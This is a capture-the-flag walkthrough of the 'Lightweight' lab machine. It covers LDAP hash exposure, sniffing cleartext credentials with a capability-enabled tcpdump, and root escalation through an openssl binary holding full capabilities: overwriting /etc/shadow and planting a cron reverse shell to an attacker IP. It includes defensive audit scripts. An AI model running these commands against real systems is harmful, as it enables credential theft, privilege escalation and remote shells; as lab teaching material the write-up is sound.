Today, we’re going to solve another CTF machine, “Lightweight”. It is now a retired box and is accessible to VIP members.

Specifications

  • Target OS: Linux
  • IP Address: 10.10.10.119
  • Difficulty: Medium

Weakness

  • Abusing Linux Capabilities

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

During this step we identify which services are running behind the IP address.

nmap -sC -sV -Pn 10.10.10.119

22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
|   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_  256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time

We have 3 open ports: SSH (22), HTTP (80) and LDAP (389). Let’s take a look at LDAP first.

LDAP Enumeration

Let’s enumerate LDAP with the ldapsearch tool, using an anonymous simple bind (-x).

ldapsearch -h 10.10.10.119 -p 389 -x -b dc=lightweight,dc=htb

# extended LDIF
#
# LDAPv3
# base <dc=lightweight,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# lightweight.htb
dn: dc=lightweight,dc=htb
objectClass: top
objectClass: dcObject
objectClass: organization
o: lightweight htb
dc: lightweight

# Manager, lightweight.htb
dn: cn=Manager,dc=lightweight,dc=htb
objectClass: organizationalRole
cn: Manager
description: Directory Manager

# People, lightweight.htb
dn: ou=People,dc=lightweight,dc=htb
objectClass: organizationalUnit
ou: People

# Group, lightweight.htb
dn: ou=Group,dc=lightweight,dc=htb
objectClass: organizationalUnit
ou: Group

# ldapuser1, People, lightweight.htb
dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
uid: ldapuser1
cn: ldapuser1
sn: ldapuser1
mail: [email protected]
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: top
objectClass: shadowAccount
userPassword:: e2NyeXB0fSQ2JDNxeDBTRDl4JFE5eTFseVFhRktweHFrR3FLQWpMT1dkMzNOd2R
 oai5sNE16Vjd2VG5ma0UvZy9aLzdONVpiZEVRV2Z1cDJsU2RBU0ltSHRRRmg2ek1vNDFaQS4vNDQv
shadowLastChange: 17691
shadowMin: 0
shadowMax: 99999
shadowWarning: 7
loginShell: /bin/bash
uidNumber: 1000
gidNumber: 1000
homeDirectory: /home/ldapuser1

# ldapuser2, People, lightweight.htb
dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
uid: ldapuser2
cn: ldapuser2
sn: ldapuser2
mail: [email protected]
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: top
objectClass: shadowAccount
userPassword:: e2NyeXB0fSQ2JHhKeFBqVDBNJDFtOGtNMDBDSllDQWd6VDRxejhUUXd5R0ZRdms
 zYm9heW11QW1NWkNPZm0zT0E3T0t1bkxaWmxxeXRVcDJkdW41MDlPQkUyeHdYL1FFZmpkUlF6Z24x
shadowLastChange: 17691
shadowMin: 0
shadowMax: 99999
shadowWarning: 7
loginShell: /bin/bash
uidNumber: 1001
gidNumber: 1001
homeDirectory: /home/ldapuser2

# ldapuser1, Group, lightweight.htb
dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb
objectClass: posixGroup
objectClass: top
cn: ldapuser1
userPassword:: e2NyeXB0fXg=
gidNumber: 1000

# ldapuser2, Group, lightweight.htb
dn: cn=ldapuser2,ou=Group,dc=lightweight,dc=htb
objectClass: posixGroup
objectClass: top
cn: ldapuser2
userPassword:: e2NyeXB0fXg=
gidNumber: 1001

# search result
search: 2
result: 0 Success

# numResponses: 9
# numEntries: 8

We found some interesting information, namely the base64-encoded userPassword attribute of each user:

Username: ldapuser1
Password (base64 userPassword): e2NyeXB0fSQ2JDNxeDBTRDl4JFE5eTFseVFhRktweHFrR3FLQWpMT1dkMzNOd2Roai5sNE16Vjd2VG5ma0UvZy9aLzdONVpiZEVRV2Z1cDJsU2RBU0ltSHRRRmg2ek1vNDFaQS4vNDQv

Username: ldapuser2
Password (base64 userPassword): e2NyeXB0fSQ2JHhKeFBqVDBNJDFtOGtNMDBDSllDQWd6VDRxejhUUXd5R0ZRdmszYm9heW11QW1NWkNPZm0zT0E3T0t1bkxaWmxxeXRVcDJkdW41MDlPQkUyeHdYL1FFZmpkUlF6Z24x

Decoding the Base64 gives us these crypt hashes:

{crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/

{crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1

The hashes are SHA-512 crypt ($6$). I tried cracking them but had no luck.
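The userPassword values above were decoded by hand. As an added example (not part of the original write-up), here is a Python parser for ldapsearch’s LDIF output that unfolds continuation lines, decodes `::` base64 attributes and classifies each hash scheme, so an administrator can check exactly what an anonymous bind exposes. The sample LDIF is constructed in the same shape as the output above, with a made-up hash; only the `{crypt}x` group value is taken from the page.

```python
import base64
import re

# Constructed sample in the shape ldapsearch prints: '::' marks a base64 value and a
# line starting with a space continues the previous one (values fold at 76 columns).
SAMPLE_HASH = "{crypt}$6$saltsalt$" + "A" * 86          # constructed, not a real hash
_B64 = base64.b64encode(SAMPLE_HASH.encode()).decode()
SAMPLE_LDIF = "\n".join([
    "# extended LDIF",
    "dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb",
    "userPassword:: " + _B64[:61],
    " " + _B64[61:],
    "",
    "dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb",
    "userPassword:: e2NyeXB0fXg=",                         # from the page: '{crypt}x'
])

def parse_ldif(text):
    """Return a list of {attribute: [values]} entries; unfolds lines, decodes '::'."""
    entries, current = [], {}
    for line in re.sub(r"\n ", "", text).splitlines() + [""]:   # join folded lines
        if line.startswith("#"):                          # ldapsearch comment lines
            continue
        if line:
            attr, _, value = line.partition(":")
            if value.startswith(":"):                     # 'attr:: <base64 value>'
                value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
            current.setdefault(attr, []).append(value.strip())
        elif current:                                     # blank line ends an entry
            entries.append(current)
            current = {}
    return entries

def classify_userpassword(pw):
    """Map a userPassword value to its storage scheme so exposed hashes can be triaged."""
    m = re.match(r"\{(\w+)\}(.*)", pw, re.S)
    if not m:
        return "cleartext"
    scheme, body = m.group(1).lower(), m.group(2)
    if scheme != "crypt":
        return scheme                                     # e.g. ssha, md5
    if body in ("x", "!", "*", "!!"):
        return "locked"                                   # placeholder, no hash stored
    return {"$6$": "sha512-crypt", "$5$": "sha256-crypt",
            "$1$": "md5-crypt"}.get(body[:3], "des-crypt")

def exposed_hashes(ldif_text):
    """What an anonymous bind reveals: (dn, scheme) for every readable userPassword."""
    return [(entry["dn"][0], classify_userpassword(pw))
            for entry in parse_ldif(ldif_text) for pw in entry.get("userPassword", [])]
```

Feed it the real `ldapsearch -x` output to get one line per exposed hash; anything other than "locked" here means password material is readable without authentication.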

Enumeration

Let’s do some enumeration and browse to http://10.10.10.119

Generally, CTF methodology calls for enumerating hidden directories and files. In this case, however, some kind of firewall blocked our scans, so we have to enumerate manually.

Going to the user.php page, it tells us that an SSH account has been created for us:

“This server lets you get in with ssh. Your IP (10.10.14.17) is automatically added as userid and password within a minute of your first HTTP page request. We strongly suggest you to change your password as soon as you get in the box.”

Let’s log in over SSH.

There is nothing in the current directory, so let’s find out what other users exist with cat /etc/passwd

Let’s enumerate further with the LinEnum.sh script.

After running the script we can see files with POSIX capabilities set.

The Linux capabilities feature gives a binary only the specific privileges it needs for its task, without giving the user root or making the binary SUID.

The tcpdump binary has the cap_net_admin,cap_net_raw+ep capabilities enabled.

/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep

**CAP_NET_RAW**
  * Use RAW and PACKET sockets;
  * bind to any address for transparent proxying.

Let’s run tcpdump on the loopback interface, capturing only LDAP traffic, and save the output to a file.

tcpdump -i lo port 389 -w capture.cap -v

Let’s transfer the capture.cap file to our local machine.

scp [email protected]:/home/10.10.14.17/capture.cap capture.cap

Inspecting the capture, we find the following credentials sent over plain LDAP in the clear:

Username: ldapuser2
Password: 8bc8251332abe1d7f105d3e53ad39ac2

Now let’s go back to our SSH session and switch user with these credentials.

[[email protected] ~]$ su ldapuser2
Password: 8bc8251332abe1d7f105d3e53ad39ac2
[[email protected] 10.10.14.17]$

We owned user.txt

Privilege Escalation

Let’s head towards the root.txt flag. There’s a file backup.7z which is password protected; let’s transfer it to our local machine and try cracking it.

We can encode backup.7z in Base64 on the box and decode it again on our local machine.

I used this tool to run a dictionary attack against backup.7z:

python main.py --files backup.7z --wordlist rockyou.txt

After extracting the 7z file we get some PHP files.

Looking at the top of status.php with cat status.php | head -30, we find:

ldapuser1
f3ca9d298a553da117442deeb6fa932d

We have the ldapuser1 credentials, so let’s su - ldapuser1

[[email protected] ~]$ su - ldapuser1
Password: f3ca9d298a553da117442deeb6fa932d

Let’s look at the files inside /home/ldapuser1/

There are some PHP files which don’t contain anything interesting. Let’s check the capabilities of the openssl and tcpdump binaries in this directory.

[[email protected] ~]$ getcap -r .
./tcpdump = cap_net_admin,cap_net_raw+ep
./openssl =ep

The openssl copy has the full capability set (=ep), so it can read files that ldapuser1 normally cannot. For example, it reads the root flag directly:

[[email protected] ~]$ ./openssl enc -base64 -in /root/root.txt -out ./root.txt.b64
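The getcap output above is a rendering of the security.capability extended attribute on each file. As an added example (not from the original write-up), here is a Python script that decodes that attribute the way getcap does, renders it in the same notation and flags the capability sets that matter on this box; `audit_file` runs it against a real path on a Linux host. The two sample xattr values are constructed to match the tcpdump and openssl lines above, and CAP_LAST_CAP = 40 assumes a kernel of 5.9 or later.

```python
import os
import struct

# Capability numbers from <linux/capability.h>; only the ones we name in reports.
CAP_NAMES = {0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
             7: "cap_setuid", 12: "cap_net_admin", 13: "cap_net_raw", 21: "cap_sys_admin"}
CAP_LAST_CAP = 40                         # Linux 5.9+; older kernels define fewer
VFS_CAP_FLAGS_EFFECTIVE = 0x1             # magic bit: permitted caps are also effective
# Constructed xattr values matching the two getcap lines above (not read from the box).
SAMPLE_TCPDUMP_XATTR = struct.pack("<IIIII", 0x02000000 | VFS_CAP_FLAGS_EFFECTIVE,
                                   (1 << 12) | (1 << 13), 0, 0, 0)
SAMPLE_OPENSSL_XATTR = struct.pack("<IIIII", 0x02000000 | VFS_CAP_FLAGS_EFFECTIVE,
                                   0xFFFFFFFF, 0, (1 << (CAP_LAST_CAP - 31)) - 1, 0)

def decode_security_capability(raw):
    """Decode a v2/v3 security.capability xattr (struct vfs_cap_data, little-endian)."""
    magic, plo, ilo, phi, ihi = struct.unpack_from("<IIIII", raw, 0)
    if (magic & 0xFF000000) not in (0x02000000, 0x03000000):   # v3 only adds a rootid
        raise ValueError("unsupported vfs_cap_data revision 0x%08x" % magic)
    bits = lambda v: {i for i in range(CAP_LAST_CAP + 1) if v >> i & 1}
    return {"permitted": bits(plo | phi << 32), "inheritable": bits(ilo | ihi << 32),
            "effective": bool(magic & VFS_CAP_FLAGS_EFFECTIVE)}

def cap_text(info):
    """Render like getcap: 'cap_net_admin,cap_net_raw+ep', or '=ep' for the full set."""
    flags = ("e" if info["effective"] else "") + ("i" if info["inheritable"] else "") + "p"
    perm = sorted(info["permitted"])
    if len(perm) == CAP_LAST_CAP + 1:
        return "=" + flags
    return ",".join(CAP_NAMES.get(i, "cap_%d" % i) for i in perm) + "+" + flags

# What an unprivileged user gains from each capability, as seen on this box.
RISK = {1: "write any file (/etc/shadow, /etc/crontab)", 2: "read any file (/etc/shadow)",
        7: "become uid 0", 13: "sniff traffic such as cleartext LDAP binds", 21: "near-root"}

def audit(raw):
    """Return (getcap-style text, reasons the file needs review) for one xattr value."""
    info = decode_security_capability(raw)
    text = cap_text(info)
    if text.startswith("="):
        return text, ["full capability set: equivalent to root"]
    return text, [RISK[c] for c in sorted(info["permitted"]) if c in RISK]

def audit_file(path):
    """Audit one file on a live Linux host; raises OSError if it has no such xattr."""
    return audit(os.getxattr(path, "security.capability", follow_symlinks=False))
```

Walking a filesystem with `audit_file` and alerting on any "=ep" result, or on a capability in RISK attached to a copy of a binary in a home directory, catches exactly the setup that gives root here.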

Getting Root By Abusing Linux Capabilities

Let’s change the root password by modifying the /etc/shadow file through the openssl capability.

[[email protected] ~]$ ./openssl enc -base64 -in /etc/shadow -out ./shadow.b64
[[email protected] ~]$ base64 -d shadow.b64 > shadow

We need to create a salted password hash with openssl; let’s use root as both the salt and the password.

[[email protected] ~]$ openssl passwd -1 -salt root root
$1$root$9gr5KxwuEdiI80GtIzd.U0

Replace the hash in the root entry of the copied shadow file with the one we just generated; it is the first line:

cat shadow | head -1

Now we use the openssl capability to overwrite the original /etc/shadow with our modified copy.

./openssl enc -in shadow -out /etc/shadow

And we got root!

We can also use a cron job to spawn a reverse shell as root.

[[email protected] ~]$ cp /etc/crontab .
[[email protected] ~]$ echo '* * * * * root /bin/bash -i >& /dev/tcp/10.10.14.17/1337 0>&1' >> crontab
[[email protected] ~]$ base64 crontab > crontab.b64
[[email protected] ~]$ ./openssl enc -d -base64 -in crontab.b64 -out /etc/crontab

Now, with a listener running, wait for a minute and you’ll get a root shell.